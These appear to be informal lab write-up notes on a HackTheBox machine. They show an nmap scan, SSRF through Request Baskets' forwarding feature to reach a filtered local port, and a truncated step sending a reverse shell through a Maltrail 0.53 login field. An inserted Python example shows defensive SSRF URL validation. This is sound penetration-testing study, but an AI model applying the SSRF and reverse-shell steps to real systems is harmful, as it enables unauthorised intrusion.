sudo nmap -p22,80,55555 -sCV 10.10.11.224
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 23:03 IST
Nmap scan report for sau.htb (10.10.11.224)
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
| 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp filtered http
55555/tcp open http Golang net/http server
| http-title: Request Baskets
|_Requested resource was /web
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Sun, 29 Jun 2025 17:34:17 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\\.]{1,250}$
| GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Sun, 29 Jun 2025 17:33:59 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Sun, 29 Jun 2025 17:34:00 GMT
| Content-Length: 0
| OfficeScan:
| HTTP/1.1 400 Bad Request: missing required Host header
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request: missing required Host header
check out 55555. has a basket of some sort
curl http://sau.htb:55555/fb2oh0w -A '{{Hello basket}}'
registers the requests and shows them
trying SSTI with -A char escaping: “\ didn't work
nothing fancy in burp
setting forwarding to my ip listener forwards the request
on setting proxy the client waits for server to respond in string> printed to fail response and ends connection
It’s a confirmed server side request forgery
if it's forwarding to my ip it should forward to its localhost:80
now curl again and check:
not all elements are loaded so not a full proxy like setup here.
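The forwarding behaviour above is the SSRF sink: the service takes a user-supplied forward URL and fetches it from the server side, so a loopback target reaches a port that is filtered from the outside. As an added example (not part of these notes and not Request Baskets' own code), this is the destination check such a service should apply before forwarding; the resolver table and its hostnames/addresses are constructed for the demo so it runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed stand-in for DNS so the example runs offline; a real service
# would resolve the host and must check every address it gets back.
RESOLVER_TABLE = {
    "localhost": ["127.0.0.1", "::1"],
    "sau.htb": ["10.10.11.224"],
    "example.com": ["93.184.216.34"],
}

def fake_resolve(host: str) -> list[str]:
    return RESOLVER_TABLE.get(host, [])

def is_internal_address(addr_text: str) -> bool:
    """True for loopback, private, link-local (incl. cloud metadata
    169.254.0.0/16), unspecified and any other non-globally-routable address."""
    return not ipaddress.ip_address(addr_text).is_global

def validate_forward_url(url: str, resolver=fake_resolve) -> tuple[bool, str]:
    """Return (ok, reason) for a user-supplied forward URL.

    Rejects non-http(s) schemes, missing hosts, unresolvable hosts, and any
    host that resolves (or is literally) a non-global address. Checking the
    resolved addresses rather than the hostname string defeats aliases such
    as 'localhost' or DNS names that point at 127.0.0.1.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        # Literal IP (IPv4 or bracketed IPv6): no resolution needed.
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        return False, f"host {host!r} does not resolve"
    for addr in addrs:
        if is_internal_address(addr):
            return False, f"host {host!r} resolves to internal address {addr}"
    return True, "ok"
```

Real deployments also need to pin the resolved address for the actual connection (re-resolving at fetch time reopens a DNS-rebinding window) and to re-run the check on every redirect hop.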
Maltrail (v0.53) exploit
there’s a login page
send a rev shell with -d ‘ username=echo ….